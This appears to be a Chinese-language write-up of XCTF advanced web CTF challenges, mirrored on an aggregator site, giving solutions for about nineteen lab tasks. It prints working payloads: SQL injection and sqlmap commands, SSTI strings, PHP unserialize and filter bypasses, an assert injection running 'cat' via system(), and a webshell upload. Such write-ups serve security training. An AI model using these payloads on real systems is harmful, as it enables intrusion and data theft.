7

攻防世界-高手进阶区-Web部分-WriteUP

 2 years ago
source link: https://iamywang.github.io/2020/adworld-web/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

0x01 baby_web

直接看F12,就能找到flag。
web-001.png

0x02 Training-WWW-Robots

robots协议,直接访问robots.txt。
web-002.png
然后找到flag。
web-003.png

0x03 php_rce

thinkphp的RCE漏洞。
https://xz.aliyun.com/t/3845\
https://cloud.tencent.com/developer/article/1512547\
web-004.png
web-005.png

0x04 Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

直接开搞,大小写绕过
web-007.png
看到flag,cat出来看看

<?php
$flag="ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}";
?>

0x05 ics-06

index.php可以传参,还写着送分题
web-006.png
爆破id,id=2333时拿flag
flag: cyberpeace{d18779aa24d5f4b51d1e9ebe6a247a53}

0x06 warmup

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

if (in_array($page, $whitelist)) {
                return true;
            }

$_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

$_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

传参file,而且看到一个hint.php,试试看

"hint"=>"hint.php"

flag不在hint
web-008.png
不过注意到必须要有hint或者source才能通过,不过还发现截取有问题\

$_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));

构造出来拿flag
web-009.png

0x07 NewsCenter

很明显sql注入
先burp抓包存下请求:
web-010.png
sqlmap找表:

sqlmap -r ncenter --dbs

找到两个表:

available databases [2]:
[*] information_schema
[*] news

继续深入:

sqlmap -r ncenter -D news --dump

在news中找到flag:

Database: news
Table: secret_table
[1 entry]
+----+--------------------------+
| id | fl4g                     |
+----+--------------------------+
| 1  | QCTF{sq1_inJec7ion_ezzz} |
+----+--------------------------+

0x08 Web_python_template_injection

http://111.198.29.45:48124/%7B%7B''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()%7D%7D

flag: ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

0x09 Web_php_unserialize

function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    }
...
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
}
...

两个绕过,所以这样构造:

$A = new Demo('fl4g.php');
$C = serialize($A);
//string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
$C = str_replace('O:4', 'O:+4',$C);//绕过preg_match
$C = str_replace(':1:', ':2:',$C);//绕过wakeup
var_dump($C);
//string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
var_dump(base64_encode($C));
//string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="

$flag=”ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}”;

0x10 NaNNaNNaNNaN-Batman

乱码,看到最后的eval,联想之前看的欢乐时光病毒,改成了alert。

<script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg{e_0iit\'_ns=[t,n,r,i];for(o=0;o<13;++o){	[0]);.splice(0,1)}}}	\'<input id="c">< onclick=$()>Ok</>\');delete _var ","docu.)match(/"];/)!=null=["	write(s[o%4]buttonif(e.ment';for(Y in $='	')with(_.split($[Y]))_=join(pop());eval(_)</script>

然后就拿到了源码。

function $(){
    var e=document.getElementById("c").value;
    if(e.length==16)
        if(e.match(/^be0f23/)!=null)
            if(e.match(/233ac/)!=null)
                if(e.match(/e98aa$/)!=null)
                    if(e.match(/c7be9/)!=null){
                        var t=["fl","s_a","i","e}"];
                        var n=["a","_h0l","n"];
                        var r=["g{","e","_0"];
                        var i=["it'","_","n"];
                        var s=[t,n,r,i];
                        for(var o=0;o<13;++o){
                            document.write(s[o%4][0]);
                            s[o%4].splice(0,1)
                        }
                    }
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _

然后看到判定了长度以及一些字符串,非常简单,输入b0ef233ac7be98aa即可。
flag: flag{it’s_a_h0le_in_0ne}

0x11 PHP2

代码泄露,http://111.198.29.45:57978/index.phps。

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

但是发现不能直接用admin,要通过url编码转换。
admin –> a%2564min

Access granted!

Key: cyberpeace{fe0187fb1b68b1a9d10c3fc0ee67787c}

0x12 unserialize3

一段残缺的代码,要传入的参数是code。

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

可以先尝试new一个实例看看。

$t = new xctf();
$s = serialize($t);
echo $s; # O:4:"xctf":1:{s:4:"flag";s:3:"111";}

很明显返回的bad requests。应该避免执行那个wakeup函数。
查到的资料:https://bugs.php.net/bug.php?id=72663\
当反序列化字符串中,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。

O:4:"xctf":3:{s:4:"flag";s:3:"111";}
# 我把1改成了3
# 然后拿到flag: cyberpeace{7f9dcb142f763dbbb2e4112be6656543}

0x13 upload1

上传一个文件,进行抓包。
web-011.png
尝试进行一句话木马。
web-012.png

upload success : upload/1586441159.1.php

蚁剑连接,拿flag。
web-013.png

0x14 supersqli

sql注入,随便注。

1'; show tables;--

拿到所有表。

array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

HANDLE语句:

HANDLER ... OPEN语句会打开一个表,使其能够用后续的HANDLER ... READ语句访问。这个不能和其他会话共享直到HANDLER ... CLOSE或会话关闭。
1';
handler `1919810931114514` open;
handler `1919810931114514` read first;--

flag:

array(1) {
  [0]=>
  string(38) "flag{c168d583ed0d4d7196967b28cbd0b5e9}"
}

0x15 easytornado

flag.txt中:

flag in /fllllllllllllag

hints中:

md5(cookie_secret+md5(filename))

传两个参数,一个是filename,另一个是这个md5。
因此实际上就是:

filename=/fllllllllllllag
filehash=md5(cookie_secret+md5(/fllllllllllllag)) # 3bf9f6cf685a6dd8defadabfb41a03a1

SSTI注入:

http://159.138.137.79:51650/error?msg={{handler.settings}}
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '4c6e1bcd-fe36-48ac-8aaf-864629aa45c4'}

这样得到filehash,从而拿flag:

filehash=d7a271c78916db6de35bc157fac1363b
flag{3f39aea39db345769397ae895edb9c70}

0x16 lottery

彩票系统,源码泄露:

python2 GitHack.py http://159.138.137.79:49428/.git/

找到api.php处存在漏洞:

if($numbers[$i] == $win_numbers[$i]){
    $same_count++;
}

php弱类型比较,所以传参的时候,给他利用一下:

{"action":"buy", "numbers":{"0":true,"1":true,"2":true,"3":true,"4":true,"5":true,"6":true}}

返回结果是这样的:

{"status":"ok","numbers":[true,true,true,true,true,true,true],"win_numbers":"8851836","money":15401806,"prize":5000000}

flag:

cyberpeace{6af0b4ebf4c625c6ababcfa41f673b49}

0x17 mfw

php代码泄露,传参page:

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

这里有一个assert,尝试从这突破:

?page=').system("cat templates/flag.php");//

直接拿flag:

<!--?php $FLAG="cyberpeace{c4641d834ad80134d88d40e437d868ea}"; ?-->

0x18 web2

PHP代码逆向:

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);
    // echo $_o;

for($_0=0;$_0<strlen($_o);$_0++){

$_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

反着逆回去就行:

<?php
    $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
    $_o=str_rot13($miwen);
    $_o=strrev($_o);
    $_o=base64_decode($_o);
    for($_0=0;$_0<strlen($_o);$_0++){
        $_c=substr($_o,$_0,1);
        $__=ord($_c)-1;
        $_c=chr($__);
        $_=$_.$_c;
    }
    echo strrev($_);
?>

flag:

flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

0x19 shrine

Flask:

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/')
def shrine(shrine):

def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

从源码可以看出:路径在/shrine/下、黑名单过滤config,self、所有的()都替换成空格
尝试get_flashed_messages()函数:

http://159.138.137.79:54847/shrine/{{get_flashed_messages.__globals__['current_app']}}

flag:

flag{shrine_is_good_ssti}

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK